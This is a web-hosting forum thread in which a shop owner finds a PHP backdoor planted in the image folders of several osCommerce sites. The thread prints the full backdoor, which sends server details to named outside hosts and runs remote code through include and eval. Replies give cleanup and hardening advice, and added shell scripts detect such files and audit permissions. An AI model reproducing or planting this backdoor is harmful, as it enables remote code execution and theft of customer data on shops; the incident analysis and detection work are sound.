
NimaP

jesus i think my site has been hijacked!


I have several sites, all with osCommerce in some form (some are hybrid sites). Anyways, I noticed someone made an account on my new site that I'm putting together, so I was a little curious how they found me. I did a search for the domain on Google and came up with the listings looking like this:

 

xspider network
xspider network, ARCADE COBRA COMAND, patch calendar commander, kukriniksi biography, spiderman 3 no cd crack, rundll dovnload, download free crack for lula ...
www.**************.com/images/infobox/xspider-network.html - 8k - Cached - Similar pages - Note this

nancy sinatra rapidshare
nancy sinatra rapidshare, download crack warcraft 3 frozen throne no cd 1.20 c, 3d analyze punisher, ultimate surrender full download, nubiles charlie ...
www.**************.com/images/infobox/nancy-sinatra-rapidshare.html - 8k - Cached - Similar pages - Note this

lfs 2 mechanic download
lfs 2 mechanic download, warcraft 3 v.1.20b no-cd, bcad version 3.7, free serial or patch for dr.divx 2.0.0 beta 6, backdoor patch crack, download full ...
www.**************.com/images/infobox/lfs-2-mechanic-download.html - 8k - Cached - Similar pages - Note this

 

So I looked in my images/infobox folder and I saw some arrow image files and a PHP file called "213378.php". So I looked around and they're in every image folder I have! There is one per folder, and they are in the catalog/image/... and catalog/admin/... of my site and every other site I have. I downloaded a fresh copy of OSC to make sure these files didn't come with OSC, and they didn't.

 

The file contains the following code (reflowed here into one statement per line, with comments; the original is a single line):

<?
error_reporting(0);
$s = "e";
// Collect request and server details, falling back to the old register_globals names
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// Base64-encode every value and join them with "." into one query string
$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "."
     . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h)
     . ".$s." . base64_encode($i) . "." . base64_encode($j);
// Remote include from the first host; if that fails, the second; otherwise fetch and eval() from the third.
// The literals decode to "http://", "a.rsdcraft.ws", "ad.runweb.info" and "http://7.xmldata.info/?".
if ((include(base64_decode("aHR0cDovLw==") . base64_decode("YS5yc2RjcmFmdC53cw==") . "/?" . $str)));
else if (include(base64_decode("aHR0cDovLw==") . base64_decode("YWQucnVud2ViLmluZm8=") . "/?" . $str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=") . $str));
?>

When I run it, I get a URL not found page, just like in the search engines. Please help... how can I protect myself?! I password protect everything.

 

Also, doing a search for similar /images/infobox/... links like the ones that showed up for me produced a ton of OSC sites that have these fake listing pages pop up.
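To find other copies of the dropped file across a site and read which hosts it contacts without executing it, here is an added example written for this thread; it is not code from the thread or from osCommerce. It is a POSIX shell script that assumes the dropped files sit under directories named "images" (as in the listings above) and that you can read the web root; the marker strings come from the posted script, and the sample file in the usage comment is constructed.

```shell
#!/bin/sh
# Added example, not code from the forum thread. Scans a web root for PHP
# files that sit inside an "images" directory (osCommerce keeps none there),
# scores each file against markers taken from the posted script, and decodes
# any base64_decode("...") literals so the remote hosts can be read directly.
# Directory names and any sample file used with it are constructed.

# List every .php file found under a directory named "images", sorted.
find_php_in_image_dirs() {
    find "$1" -type f -name '*.php' -path '*/images/*' 2>/dev/null | sort
}

# Count how many of the markers from the posted script a file contains.
# Three or more is a strong signal that the file is a dropped backdoor.
score_file() {
    n=0
    for marker in 'error_reporting(0)' 'base64_decode(' 'include(' \
                  'eval(' 'file_get_contents('; do
        if grep -qF -- "$marker" "$1"; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# Print the plaintext of every base64_decode("...") literal in a file,
# one per line; this is how the hostnames in the thread were recovered.
decode_b64_literals() {
    grep -oE 'base64_decode\("[A-Za-z0-9+/=]+"\)' "$1" 2>/dev/null \
      | sed -E 's/^base64_decode\("(.*)"\)$/\1/' \
      | while IFS= read -r enc; do
            printf '%s' "$enc" | base64 -d 2>/dev/null || printf '(undecodable)'
            printf '\n'
        done
}

# Walk a web root and report each suspicious file as "<score><tab><path>",
# followed by the decoded literals for any file that scores 3 or more.
scan_web_root() {
    find_php_in_image_dirs "$1" | while IFS= read -r f; do
        s=$(score_file "$f")
        printf '%s\t%s\n' "$s" "$f"
        if [ "$s" -ge 3 ]; then
            decode_b64_literals "$f" | sed 's/^/    decoded: /'
        fi
    done
}

# Usage: scan_web_root /path/to/public_html
```

The score is deliberately based on several markers rather than one, since `include(` alone appears in legitimate PHP; a file in an image directory that combines `error_reporting(0)`, `base64_decode(` and a remote `include(` or `eval(file_get_contents(` is the pattern seen here. Decoding the literals reads the file as data, so nothing in it is executed.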


First thing you need to do is change all of the passwords on your hosting account: all FTP, cPanel, etc. etc. etc...

 

What version of OSC are you using?

 

What Contributions have you installed?

 

You need to delete every file and re-upload a KNOWN SAFE backup, or a new download from here...

 

 

This script sends identifying information to a remote host, and has the potential of executing PHP, including accessing your database and getting customer data....

 

It is requesting a file from

 

a.rsdcraft.ws

ad.runweb.info

7.xmldata.info/?

 

I found one other site hacked with this script; they traced it back to an unpatched PHP security hole, so make sure your server is running the latest PHP version...

 

Also make sure your permissions are correct. Only have write turned on in the temp and public upload dirs; turn write permissions OFF unless you're changing things..


I have some sites that are MS2 and some that are RC2. Both are hit.

 

I have a HUGE list of contributions installed on some of these sites. I looked back at my last 2 backups, which is a month of data, and the files are in the backups. I went ahead and deleted every known file of this script I could find. I also just changed all my passwords for the FTP, database, folder protection, and OSC account login.


You should ask your webhosts how these attacks were successful.


The Coopco Underwear Shop

 

If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.


If your hosts are using a version of PHP with known vulnerabilities, then the site could be hacked again.

 

If your hosts provide cPanel and other sites on the server have been hacked then your site will be hacked again - because cPanel has no jailed root for websites (hack one, hack them all!).

 

Vger


I think this condition is called a local attack. There are many servers hacked like that.

---------------

Lary Man


As far as I know this "hack" is because the images folder has "777" permissions.

 

They should be no higher than "755".


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

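The permission advice in this thread (write access only on the temp and upload directories, and nothing above "755" on the images folder) can be checked rather than eyeballed. The following is an added example, not code from the thread or from osCommerce: a POSIX shell script that lists world-writable directories under a web root, flags the ones outside an allow-list you supply, and can reset those to 755. The allow-list names "tmp" and "images/upload" used in the usage comment are placeholders; substitute the directories your own install genuinely writes to.

```shell
#!/bin/sh
# Added example, not code from the forum thread. Audits directory permissions
# under a web root: world-writable directories are listed, any that are not on
# the caller's allow-list (the temp and upload directories that genuinely need
# write access) are flagged, and those can then be reset to 755. The allow-list
# entries in the usage comment are constructed placeholders.

# Print every world-writable directory under the root, sorted.
# -perm -002 tests the "other write" bit, so it matches 777, 757, 767 and so on.
list_world_writable_dirs() {
    find "$1" -type d -perm -002 2>/dev/null | sort
}

# Flag world-writable directories outside the allow-list.
# Arguments: the web root, then relative paths of directories allowed to stay writable
# (a listed directory also covers everything beneath it).
audit_writable_dirs() {
    root="$1"
    shift
    list_world_writable_dirs "$root" | while IFS= read -r d; do
        rel="${d#"$root"/}"
        allowed=0
        for a in "$@"; do
            case "$rel" in
                "$a"|"$a"/*) allowed=1 ;;
            esac
        done
        if [ "$allowed" -eq 0 ]; then
            printf '%s\n' "$d"
        fi
    done
}

# Reset every flagged directory to 755 and print what was changed.
# Same arguments as audit_writable_dirs.
fix_unexpected_writable() {
    audit_writable_dirs "$@" | while IFS= read -r d; do
        chmod 755 "$d"
        printf 'reset to 755: %s\n' "$d"
    done
}

# Usage: audit_writable_dirs /path/to/public_html tmp images/upload
#        fix_unexpected_writable /path/to/public_html tmp images/upload
```

Run the audit first and read its output before running the fix, since a directory your shop writes to (session storage, a cache, an upload target for product images) that is missing from the allow-list will be reset and the site will start failing on writes; add it to the allow-list and rerun. Tightening modes does not remove files already dropped, so this complements, rather than replaces, the file cleanup and password changes discussed above.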